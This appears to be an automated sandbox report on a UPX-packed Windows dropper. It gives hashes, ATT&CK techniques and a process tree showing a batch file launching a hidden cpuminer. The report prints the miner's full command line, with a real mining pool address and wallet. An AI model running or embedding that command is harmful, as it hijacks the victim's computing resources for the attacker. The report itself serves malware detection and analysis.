73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 11:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5404	b2e.exe
2092	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe
2092	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5352-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5352 wrote to memory of 5404	5352	batexe.exe	91
PID 5352 wrote to memory of 5404	5352	batexe.exe	91
PID 5352 wrote to memory of 5404	5352	batexe.exe	91
PID 5404 wrote to memory of 1808	5404	b2e.exe	92
PID 5404 wrote to memory of 1808	5404	b2e.exe	92
PID 5404 wrote to memory of 1808	5404	b2e.exe	92
PID 1808 wrote to memory of 2092	1808	cmd.exe	95
PID 1808 wrote to memory of 2092	1808	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5352
- C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8E46.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe

Filesize
10.2MB

MD5
18179f43b9b9ea7189a01a55fec4d95a

SHA1
d61f2ddc12b135b0bf211627012aef0070cd0a59

SHA256
ee9b9c2c952301f4f277edcabefd7ddf73e6a44cb84d20f548750e417025ec86

SHA512
bbb91e97a3880b1847fcbacd72f01afd801242c458bd3f93fd0595c4c1b2cb30b894879840b1ead88a71cebe74dd251b43d19740096b9e187fbd772366db4f48

Download Submit
C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe

Filesize
3.0MB

MD5
8f561cfe9a5beb69b8040bd469379c32

SHA1
814d1e2230e89498b13b26793ed663c6faf34a9e

SHA256
eb7608640bc2659ed26e228e159795095c5cf01c2e6c78069188a7a3c93c1cd5

SHA512
95b4c2dc78e3bf13100217c485df51868204f0f8aaec76934fcabd6298ff0264b837d05b955cc27353ed57806a12b1d4011eb410b4d3696a8beb77f55ba8117b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8964.tmp\b2e.exe

Filesize
3.3MB

MD5
63afa1f465b9ea790e5b3a1c15e4c8ca

SHA1
66f5153aa22e074a0ac066f394371334e996a94a

SHA256
b3889c0128b6fd4cca550550c5a4d5e5191131c4c172bc8f62c30ae20bca5970

SHA512
078e3513230e93c368924f5daed19c81bdda5dbccee7745d68d583775a2620175f6118537b8c62f409ed0b3be3f1cc3afd97c1fcd391e898398063f157ab241f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E46.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
630KB

MD5
42efaba8d7451f673364b277ca0d4ca4

SHA1
77741320cdfb902c57681af61a1557aab3645e27

SHA256
9f225fb5ff8c625c48464b91a76ade7ba8e0a426c17387cbbdcb09ced10d286f

SHA512
03969bf66fd53733e75349c5630c53b0ce346f6297369ca902f6e1d2cc1c94bfad8711694446238d98727c4d45d1f8b23cad1db9be11f34f10b4383f0f7f9ad8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
570KB

MD5
771ffa0fd13d96ef57a0f30729584add

SHA1
22493c7dbe9703bc5b8baafffb46be14ae72b8bb

SHA256
f70108d79d6d657393a696e17301c9e8084756db8f80a534790a83e9d7b4fdde

SHA512
aa397add60296c5e8c8df2c6f04c5908ccaadd0358b3a8f8f4b70379d46b2fd73de1442de6ecbed6b3cf25b61a9fe9b7cf88018a36d700507ac677994b95bd48

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
432KB

MD5
8c6efb4dddf2146c99af2d540c930aa9

SHA1
fe9988eb2ad6b17cba57991772aa7aae483fb815

SHA256
07adc65b0c03c8a393bbded04d63ec1c06cac45274e1d01ce8db61f799d1ff4a

SHA512
a1e6d48d9ef703f9088c28d28aa03d8904f972d81bd5a6e6983ab0a65f0a8d4a9a2ac7ac4771ce8e85043090f5290b191cfe776f310daf7cf6e50562597d91ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
507KB

MD5
7dfb29e9efe5a1f3eb8396cc0c862044

SHA1
dffc9c3610b5939157160af0104efc0c6b397d04

SHA256
ebd4ef02670da7c601f84de924fdead743e1fac6dc88d0f3380b18ade3ff8966

SHA512
e6e23184511643b6eb1637128c3dd1ee4b37fd22173d900238f78c084d346c07f7d765e97a43b7e3e37bab125367864c412cddb295162ba56f14a9b8e50dcc8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
384KB

MD5
b91f7bb5508b343188ec32dcc7880611

SHA1
fe2ae7ba4a1bbb2a5df7b73f21a0b8fc745cc11f

SHA256
47881756cdfcb302e63efb2016c122a1bb61574d81186275aef3d5a9fb72b84b

SHA512
a5b91bc653cbf28219b6f169d5d849fb53eced9a932b8edf468c9092544795ee8120d5c76f0c45f27b7a2464c328f5bffcabf3e83d2e7236263ea930cf92eea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
429KB

MD5
d6b24415ac375c5d6a6822369fffc043

SHA1
524d470c2ceb7c391a6b90740cce5483368e814f

SHA256
d69aa7f98bf339836c1aef8675d9b61ad0fc0a77eda36b253e2b00eb23d80c09

SHA512
53b6075e8b3c94b0e573071dd2bc328015349376958b1af926cbe333e40abf64ad8065b54b1aacbce2f798f94809f67f5e7b4da9bea64a1f894483504dc6644b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
326KB

MD5
112e892f31f64257fc628e2701d2d16b

SHA1
7350b5bd1fc8f53ef0a652be4baa112bb2de0c6d

SHA256
b18cf4b4e97514c938088a033f4499ed5ffa05fb6781b9376b0f291e3603802e

SHA512
e8dc941bb90846892b7ea22a059c744db49b9710d3bedb798c76e243c760afe45543b79817cc435e504bbba0f4ba30f73f6ad17cd7f61d42106083683670ce39

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
264KB

MD5
6011d5092012343eba8f741679ec0c3c

SHA1
3d70b3d642fb3944470210dd69f75f1944202165

SHA256
f9b7f58e9b0781a91eaf62d7d5bff2d9994e7e0dcf3c8678e47b4b2b03c73a73

SHA512
2e83e8d75514d74358789c5028fac93bbc7283b547eadb2f9eb7667ee6119c3894108a4c1f5459bd8d4f990bd456ffb97b772fb307e4601db4a4d2c6fcc0416e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
286KB

MD5
1aaec374a16d623af47db189ef32e75d

SHA1
adbee94dde3ae534e7a2ee583c957422c95c4014

SHA256
9253ecd46a9dfd9dce669e20823a29c0ee0fcc67e61ac3e024c21b44fe8c808e

SHA512
6d5c97b9ea98b154251674d6bb7357387f66e6ada0f33d3b6272256b2a8cb225d3a67772078bf16f3906044cfd5dac9a77ee1f68aa1d9df68c565f324a53613e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
247KB

MD5
29f7ef1bf8f3c8f3444f85215ca744d2

SHA1
e09bc66a5bda251e5a05d28f5312f8e6a9c9f3fc

SHA256
8c3220cf9e2a4163b248c620471f98509d85ee64bb10af244e93688a2385d4f5

SHA512
cee8f0c42e7a7661874f1a96870fbc57d5ac172398c980919fd72c40f55c19b0e2003998a33750b0d8e2dde49abc7089e965a65b05a772fa55bfbcdf58b42842

Download Submit
memory/2092-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-46-0x000000005DD80000-0x000000005DE18000-memory.dmp

Filesize
608KB

Download
memory/2092-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2092-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2092-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2092-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2092-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5352-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5404-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5404-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download